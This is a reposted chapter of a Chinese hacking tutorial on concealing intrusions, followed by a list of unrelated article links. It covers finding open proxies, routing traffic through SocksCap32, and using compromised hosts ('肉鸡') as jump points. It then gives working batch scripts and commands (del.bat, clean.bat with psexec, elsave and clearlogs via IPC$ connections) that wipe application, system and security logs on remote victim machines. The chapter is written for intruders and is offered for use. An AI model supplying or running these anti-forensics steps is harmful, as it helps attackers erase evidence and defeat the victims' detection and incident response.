七:如何实现代理与日志清除技术
来源:互联网 发布:源码分享是什么意思 编辑:程序博客网 时间:2024/04/30 14:02
在找到远程主机/服务器的系统漏洞之后,入侵者往往会对其进行试探性的入侵。此时为了避免被经验丰富的网络安全专家发现,入侵者会在入侵时使用各种方法隐藏自己,尽量不去直接与目标主机接触,以免直接暴露给远程主机/服务器。在隐藏自己的各种手段中,使用代理服务器和跳板技术是最为常见的一种。
主要内容:
·代理服务器软件的使用
·日志文件的清除
7.1 代理服务器软件的使用
代理服务器可用于局域网计算机与Internet连接时共享上网,而黑客则可通过代理服务器软件对某台计算机进行扫描,从而截获目标计算机的重要信息,以达到入侵的目的。
7.1.1 利用代理猎手找代理
代理猎手是一款集搜索与验证于一身的软件,可以快速查找网络上的免费Proxy。其主要特点为:支持多网址段、多端口自动查询;支持自动验证并给出速度评价;支持后续的时间预测;支持用户设置最大连接数(可以做到不影响其他网络程序)并运行自动查找最新版本。其最大的特点是搜索速度快,最快可以在十几分钟搜完整个B类地址的65536个地址。
代理猎手可以通过百度、雅虎、新浪等搜索引擎查找代理猎手下载链接进行下载。
1.添加搜索任务
在代理猎手安装完毕后,还需要添加相应的搜索任务,具体的操作步骤如下。
STEP01:启动“代理猎手”
STEP02:添加搜索任务
STEP03:地址范围设置
STEP04:添加搜索IP范围
STEP05:IP地址范围添加成功
STEP06:进入“已定义的IP地址范围”对话框
STEP07:添加搜索IP地址范围
STEP08:查看已定义的IP地址范围
STEP09:读入地址范围
STEP10:返回“已定义的IP地址范围”对话框
STEP11:返回“地址范围”对话框
STEP12:打开“端口和协议”对话框
STEP13:添加端口和协议
STEP14:返回“端口和协议”对话框
2.设置参数
在设置好搜索的IP地址范围后,就可以开始进行搜索,但为了提高搜索效率,还有必要先设置一下代理猎手的各项参数。具体的操作步骤如下。
STEP01:打开“代理猎手”窗口
STEP02:运行参数设置
小技巧
代理猎手默认的搜索、验证和Ping的并发数量分别为50、80和100,如果用户的带宽无法达到,就最好相应地减少各个并发数量,以减轻网络的负担。
STEP03:验证数据设置
STEP04:代理调度设置
STEP05:其他设置
STEP06:返回主界面
3.查看搜索结果
在搜索完毕后,就可以查看搜索的结果,具体的操作步骤如下。
STEP01:查看搜索结果
“验证状态”为Free的代理,即为可以使用的代理服务器。
STEP02:查看代理调度
找到可用的代理服务器之后,右键单击该代理,通过快捷菜单将选定的代理加入到调度中。这样代理猎手就可以自动为服务器进行调度了,多增加几个代理服务器有利于网络速度的提高。
提示
一般情况下,验证状态为Free的代理服务器很少,但只要验证状态为“Good”就可以使用了。
小技巧
用户也可以将搜索到的可用代理服务器IP地址和端口输入到网页浏览器的代理服务器设置选项中,这样,用户就可以通过该代理服务器进行网上冲浪。
7.1.2 用SocksCap32设置动态代理
SocksCap32代理软件是一款基于Socks协议的网络代理客户端软件,它能将指定软件的任何Winsock调用转换成Socks协议的请求,并发送给指定的Socks代理服务器。可用于使基于HTTP、FTP、Telnet等协议的软件,通过Socks代理服务器连接到目的地。
使用SocksCap32软件前,需要先有一个Socks的代理服务器(不管是用代理猎手找出来的,还是从各个代理网站中得到的,就是要有一个)。目前,SocksCap32软件可以通过搜索引擎找到其下载地址,并将其下载到本地磁盘中。
1.建立应用程度标识
当第一次运行SocksCap32程序时,将显示“SocksCap许可”对话框。在单击“接受”按钮接受许可协议内容后,才能进入SocksCap32的主窗口,如下图所示。
“SocksCap许可”对话框
建立应用程序标识的具体操作步骤如下。
STEP01:打开SocksCap32主窗口
STEP02:新建应用程序标识项
STEP03:选择需要代理的应用程序
STEP04:返回主窗口
提示
添加的应用程序可以是E-mail工具、FTP工具、Telnet工具,以及当今最热门的联网游戏等。
2.设置选项
设置SocksCap32选项的具体操作步骤如下。
STEP01:打开SocksCap32的主窗口
STEP02:SocksCap设置
在“Socks设置”选项卡中对服务器以及协议进行设置。
提示
如果用户查找的代理服务器需要用户名和密码,且已获得该用户名和密码,则可勾选“用户名/密码”复选框。若勾选“用户名/密码”复选框,则单击“确定”按钮后,需要在“用户名/密码验证”对话框中输入用户名和密码,如下图所示。
STEP03:添加直接连接的IP地址等
STEP04:设置直接连接的应用程序和库
STEP05:设置日志信息
在设置好代理选项并添加好代理应用程序后,在应用程序列表中选取需运行的应用程序,单击“文件”>“通过Socks代理运行”菜单项,即可启动该应用程序并通过代理进行登录。如果需要使某个应用程序通过SocksCap32代理,则必须通过SocksCap32启动。
7.1.3 防范远程跳板代理攻击
一些黑客技术本身,初一接手时还感觉不到它的妙处,越是使用得久,越能在不经意间发现其奥妙,远程跳板代理攻击模式即为这样的一种技术。
1.扫描选择目标
这里使用的工具是国内享有盛誉的流光软件,主要理由是它所特有的一种扫描模式:远程扫描模式。通过在对远程肉鸡上的安装,就可以轻易实现扫描远程的跳板式扫描。具体操作步骤如下。
STEP01:运行“Fluxay”软件
STEP02:主机扫描设置
STEP03:开始扫描目标主机
STEP04:查看扫描结果
STEP05:返回主窗口
STEP06:IPC自动探测
STEP07:返回主界面
查看在目标主机下探测到的用户。
2.代理跳板的架设
代理架设的方法很简单,具体的操作步骤如下。
首先,通过3389远程登录自己的肉机,选择“开始”,在搜索文本框中输入cmd,即可进入“命令提示符”窗口。
然后在当前命令提示符下输入“net use\\192.168.0.55""/user:"Administrator"”命令,即可建立空连接。稍等片刻,就会显示“命令执行成功”信息。
7.2 日志文件的清除
日志文件记录了用户在系统中进行的所有操作,如系统中出现的错误、安全等问题,这样日积月累下来,逐渐加重了服务器的负荷。对于黑客而言,这个记录了入侵踪迹的文件更应该及时清除掉,以免被管理员抓住“小尾巴”。
7.2.1 手工清除服务器日志
在入侵过程中,远程主机的Windows系统会对入侵者的登录、注销、连接、甚至复制文件等操作进行记录,并把这些记录保留在日志中。在日志文件中记录着入侵者登录时所有的账号以及入侵者的IP地址等信息。入侵者通过多种途径来擦除留下的痕迹,往往是在远程被控主机的“控制面板”窗口中打开事件记录窗口,在其中对服务器日志进行手工清除。具体的操作步骤如下。
STEP01:IPC$成功连接
STEP02:打开“系统和安全”窗口
STEP03:查看各种工具
STEP04:打开“计算机管理”窗口
STEP05:查看事件类型
STEP06:查看事件实例
STEP07:查看事件具体信息
STEP08:删除事件
7.2.2 使用批处理清除远程主机日志
一般情况下,在Windows系统中,日志文件的扩展名为log、txt,这样就可以编写一个批处理文件来实现对日志文件的清除。具体的实现步骤如下。
STEP01:编写一个批处理文件del.bat,代码如下。
@del c:winntsystem32logfiles*.* @del c:winntsystem32config*.evt @del c:winntsystem32dtclog*.* @del c:winntsystem32*.log @del c:winntsystem32*.txt @del c:winnt*.txt @del c:winnt*.log @del c:del.bat
提示
在上面的代码中echo是DOS下的回显命令,在它的前面加上“@”前缀字符,表示执行时本行在命令行或DOS里面不显示,另外del命令是删除文件命令。
STEP02:再新建一个批处理文件clean.bat,其具体内容如下。
@copy del.bat \%1c$ @echo 向肉鸡复制本机的del.bat……OK @psexec \%1 c:del.bat @echo 在肉鸡上运行del.bat,清除日志文件……OK
STEP03:假设已经与肉鸡进行了IPC$连接,则只要在MS-DOS命令提示符窗口中输入“clean.bat肉鸡IP”命令,就可以清除肉鸡上的日志文件。
7.2.3 使用清理工具清除日志
日志文件记录了用户在系统中进行的所有操作,如系统中出现的错误、安全等问题,这样日积月累下来,逐渐加重了服务器的负荷。对于黑客而言,这个记录了入侵踪迹的文件更应该及时清除掉,以免被管理员抓住了“小尾巴”。此时,黑客就会借助一些工具来清除日志。常用的工具是:elsave和CleanIISLog。这样,就使清除日志工作变得更为简单和快捷。
1.利用elsave清除日志
elsave是一款由小榕制作的清除日志工具,使用此工具不仅可以清除本地计算机的日志,还可以远程删除“事件查看器”中的相关的日志。
命令格式为elsave[-s\\server][-l log][-F file][-C][-q],其中各个参数的含义如下。
·-s\\server:指定远程计算机。
·-l log:指定日志类型、其中“application”为应用程序日志;参数“system”为系统日志;参数“security”为安全日志。
·-F file:指定保存日志文件的路径。
·-C:清除日志操作,注意“C”为大写。
·-q:把错误信息写入日志。
使用elsave.exe删除远程主机中日志的具体操作步骤如下。
STEP01:打开E盘根目录
将“elsave.exe”粘贴至E盘根目录。
STEP02:打开本地“命令提示符”窗口
输入“net use\\192.168.0.7\ipc$/user:administrator”命令会出现“输入密码”提示信息。输入远程主机的密码后,即可与远程主机/服务器进行连接用IPC$连接。
STEP03:删除远程计算机中的应用程序日志
输入e:,按“Enter”键切换至E盘跟目录。然后输入“elsave–s\\192.168.0.7–l"application"–C”命令即可。
STEP04:删除该远程主机中的系统日志
输入命令“elsave–s\\192.168.0.7–l"system"–C”,即可将其删除。
STEP05:清除远程主机的安全日志
输入“elsave–s\\192.168.0.7–l"security"–C”命令即可。在输入命令时要注意命令的最后一个参数C,该参数一定要大写,否则命令在运行时就会出错。
STEP06:在本地“命令提示符”窗口中输入“net use\\192.168.0.7\ipc$/del”命令,即可断开IPC$连接。这样,黑客便成功地删除了远程主机中的事件日志。
STEP07:也可以编写一个批处理文件clear.bat,具体内容如下。
net use \\%1\ipc$ %3 /user:%2elsave -s \\%1 -l "application" -Celsave -s \\%1 -l "system" -Celsave -s \\%1 -l "securtity" -Cnet use \\%1\ipc$ /del
STEP08:把该文件存储到和Elsave.exe文件相同的文件夹下,在“命令提示符”窗口中运行“Clear.bat 192.168.0.7Adminstrator"037971"”命令,即可清除远程计算机的日志记录。
2.利用ClearLog工具清除日志
若想清理系统、安全与程序日志,也可利用ClearLog工具。由于该程序可直接进行远程清理,不需要将此程序上传到目标服务器中运行,利用它可以清理Windows的一般日志,包括系统日志(System Log)、安全日志(Security Log)与程序运行日志(Applications Log)。clearlogs的命令格式为:clearlogs[\\computername]<-app/-sec/-sys>。
-app=应用程序日志
-sec=安全日志
-sys=系统日志
下面以清除192.168.0.16机子上的事件日志为例进行介绍,具体的操作步骤如下。
STEP01:用IPC$连接把clearlogs上传到远程计算机。在MS-DOS命令提示符窗口中输入命令“net use\\192.168.0.16\ipc$""/Susan”。
STEP02:清除远程主机上的日志。再通过“net time”命令查看远程计算机的系统时间,再用AT命令建立一个计划任务来执行clearlogs.exe文件:AT时间c:\clear.bat。
clearlogs \\192.168.0.16 -app 清除远程计算机的应用程序日志clearlogs \\192.168.0.16 -sec 清除远程计算机的安全日志clearlogs \\192.168.0.16-sys 清除远程计算机的系统日志
或者为了更安全一点,也可以建立一个批处理文件clear.bat。
@echo offclearlogs -appclearlogs -secclearlogs -sysdel clearlogs.exedel c.batexit
STEP03:断开IPC$连接。使用命令“net use\\192.168.0.16\ipc$/del”,经过上述操作之后,远程主机中的日志记录就可以被清除了。
通过执行上述命令,即可轻松将自己入侵的日志清除干净,不必一个个去辛苦查找各项日志文件的存放位置后再清除,这两个小工具会自动帮助用户完成这些烦琐的事情。但此工具只能删除默认文件夹中的日志文件,如果目标服务器的网管将日志文件位置改到其他文件夹中,使用这个工具就不能清除。
- 七:如何实现代理与日志清除技术
- 如何清除vCenter日志
- 如何清除归档日志
- [原创]WCF技术剖析之七:如何实现WCF与EnterLib PIAB、Unity之间的集成
- WCF技术剖析之七:如何实现WCF与EnterLib PIAB、Unity之间的集成
- 如何清除SQL server日志
- 如何清除SQL server日志
- 如何清除SQL server日志
- 如何清除Httpclint的日志
- 教你如何清除SQL日志
- 如何清除SQL Server数据库日志文件
- 教你如何清除SQL日志
- 如何在Linux下清除系统日志
- 如何清除Xcode8打印的系统日志
- 动态代理实现日志记录
- 如何实现反向代理?与正向代理的区别以及Nginx 反向代理优势
- 日志的压缩与清除技巧
- 技术实现(1)之业务日志和监控日志的设计与实现
- Android AsyncTask源码简单分析
- u-boot添加自己的命令—UBI镜像还原工具开发
- 查看linux系统版本命令
- 关于ListView的知识(1)
- 关于ListView的知识(2)
- 七:如何实现代理与日志清除技术
- 关于ListView的知识(3)
- 工具类Application和UIUtils
- 职场晋升有内幕,快来看看吧
- python学习
- NSObject-拷贝 NSCopy-NSMutablecopy
- 手把手教你写shell脚本——shell循环结构
- 笔记_Maya绑定基础_骨骼的 关节显示与设置
- ios cell.imageview大小修改